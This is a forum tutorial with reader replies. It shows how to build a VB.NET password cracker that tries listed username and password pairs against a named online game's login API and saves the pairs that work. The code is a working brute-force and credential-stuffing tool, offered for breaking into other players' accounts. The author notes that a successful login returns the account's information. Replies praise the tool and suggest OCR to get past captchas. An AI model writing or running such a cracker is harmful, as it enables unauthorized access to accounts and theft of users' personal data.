[vb.net]How to make a simple Password cracker

First what you'll need is
  • 3 Listboxs

  • 3 labels

  • 1 Button

  • A Game to Crack/Site

Step 2 make your form like this:

Step 3 that lets add the code:
Code
Imports System.Threading
Public Class Form1
    Dim t1 As New System.Threading.Thread(AddressOf cracker) 'using threading so it doens't lag
    Public Sub cracker()
        For x = 0 To ListBox1.Items.Count - 1
            For y = 0 To ListBox2.Items.Count - 1
                ListBox1.SelectedIndex = x
                ListBox2.SelectedIndex = y
                Dim url As New Net.WebClient
                Dim str As String = url.DownloadString("https://apps.dxd.go.com/dxd/flashAPI/login?username=" & ListBox1.SelectedItem & "&password=" & ListBox2.SelectedItem & "&promotionName=Pirates%5FOnline%5FRegistration%5FDefault")
                If str.Contains("<success>1</success>") Then
                    ListBox3.Items.Add(ListBox1.SelectedItem & ":" & ListBox2.SelectedItem)
                    GoTo next1 ' so it doesn't keep cracking the cracked account ^_^
                Else
                    'failed loooool
                End If
            Next y
next1:
        Next x
    End Sub

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Control.CheckForIllegalCrossThreadCalls = False ' gets rid of that annoying error
        t1.Start() ' starts cracking thread
    End Sub
End Class

I'm using this game Pirates Online (shit game) and when the login fails the response on the page is "<error>LOGIN_FAILED</error>" but when you crack an account they throw this at you "<success>1</success>" plus all the account information. Click to see

I won't be teaching you how to get the urls to crack so don't ask lol :P

4th, add your test account plus fake accounts:

Now run the Debug and Fire her UP!!!

Click Me to See Test Run! (Click to View)

Congratz! Your first password cracker! Ok no leechy now. This is my first tut so if its not up to standards give me a break :P
Nice tut Jade, easy to understand aswell.
That's a very simple bruteforce.
Good work thought :)

I would suggest you learn about OCR, so you can bypass captchas.

Also this guide is very explanationfull.

It's not a bruteforcer..

And isn't it you who are to learn/implement OCR? OP provided the basics, you keep building on it.
Probably coding some useless shit.
If anyone gets stumped, or needs a question answered. Ask away :)

You have a very good point sir. If I was any good at coding I would add on to it. But nice job on it. Keep up the good work.
Code
Control.CheckForIllegalCrossThreadCalls = False ' gets rid of that annoying error
Bad coding practices are bad.

First thing that was brought to my attention.

I would've thought the word illegal in the property was enough to give it away, but apparently not 😁

I've tested OCR few minutes ago; It's having a hard time recognizing captcha from reCaptcha.
